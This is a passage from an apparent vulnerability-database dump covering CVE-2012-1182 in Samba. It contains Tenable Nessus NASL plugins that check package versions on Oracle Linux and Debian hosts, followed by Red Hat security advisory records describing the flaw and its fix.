samba4 packages\nand several API changes. (BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs :\n\n* When the user tried to modify a meeting with one required attendee\nand himself as the organizer, a segmentation fault occurred in the\nmemcpy() function. Consequently, the evolution-data-server application\nterminated unexpectedly with a segmentation fault. This bug has been\nfixed and evolution-data-server no longer crashes in the described\nscenario. (BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages\nwith a large message body or with extensive attachment. This was\ncaused by minor issues in OpenChange's exchange.idl definitions. This\nbug has been fixed and OpenChange now sends extensive messages without\ncomplications. 
(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated\npackages, which fix these issues and add these enhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003302.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openchange packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:evolution-mapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:openchange-devel-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"evolution-mapi-devel-0.28.3-12.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-client-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-1.0-4.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"openchange-devel-docs-1.0-4.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"evolution-mapi / evolution-mapi-devel / openchange / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:46", "description": "From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. 
A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. 
(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.", "edition": 22, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 6 : samba4 (ELSA-2013-0506)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:samba4-dc", "p-cpe:/a:oracle:linux:samba4-devel", "p-cpe:/a:oracle:linux:samba4-dc-libs", "p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator", "p-cpe:/a:oracle:linux:samba4-swat", "p-cpe:/a:oracle:linux:samba4-client", "p-cpe:/a:oracle:linux:samba4-pidl", "p-cpe:/a:oracle:linux:samba4-winbind-clients", "p-cpe:/a:oracle:linux:samba4-common", "p-cpe:/a:oracle:linux:samba4-winbind", "p-cpe:/a:oracle:linux:samba4-python", "p-cpe:/a:oracle:linux:samba4-test", "p-cpe:/a:oracle:linux:samba4-libs", "p-cpe:/a:oracle:linux:samba4"], "id": "ORACLELINUX_ELSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/68746", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# Oracle 
Linux Security Advisory ELSA-2013-0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68746);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"Oracle Linux 6 : samba4 (ELSA-2013-0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2013:0506 :\n\nUpdated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. 
SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. 
(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2013-February/003301.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"samba4-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-client-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-common-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-dc-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-devel-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-libs-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", 
reference:\"samba4-pidl-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-python-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-swat-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-test-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-clients-4.0.0-55.el6.rc4\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba4-winbind-krb5-locator-4.0.0-55.el6.rc4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:24", "description": "It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.", "edition": 16, "published": "2012-04-13T00:00:00", "title": "Debian DSA-2450-1 : samba - privilege escalation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2012-04-13T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:samba"], "id": "DEBIAN_DSA-2450.NASL", "href": "https://www.tenable.com/plugins/nessus/58729", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2450. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58729);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"DSA\", value:\"2450\");\n\n script_name(english:\"Debian DSA-2450-1 : samba - privilege escalation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Samba, the SMB/CIFS file, print, and login\nserver, contained a flaw in the remote procedure call (RPC) code which\nallowed remote code execution as the super user from an\nunauthenticated connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=668309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/samba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2450\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the samba packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba 
SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libpam-smbpass\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libsmbclient-dev\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libwbclient0\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"samba-common\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-common-bin\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-dbg\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-doc-pdf\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"samba-tools\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"smbclient\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"swat\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"winbind\", reference:\"2:3.5.6~dfsg-3squeeze7\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:50:23", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0466", "href": "https://access.redhat.com/errata/RHSA-2012:0466", "type": "redhat", "title": "(RHSA-2012:0466) Critical: samba3x security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:47", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. 
After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2017-09-08T11:49:10", "published": "2012-04-13T04:00:00", "id": "RHSA-2012:0478", "href": "https://access.redhat.com/errata/RHSA-2012:0478", "type": "redhat", "title": "(RHSA-2012:0478) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:54", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. 
Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n", "modified": "2018-06-06T20:24:36", "published": "2013-02-21T05:00:00", "id": "RHSA-2013:0506", "href": "https://access.redhat.com/errata/RHSA-2013:0506", "type": "redhat", "title": "(RHSA-2013:0506) Moderate: samba4 security, bug fix and enhancement update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:53", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba 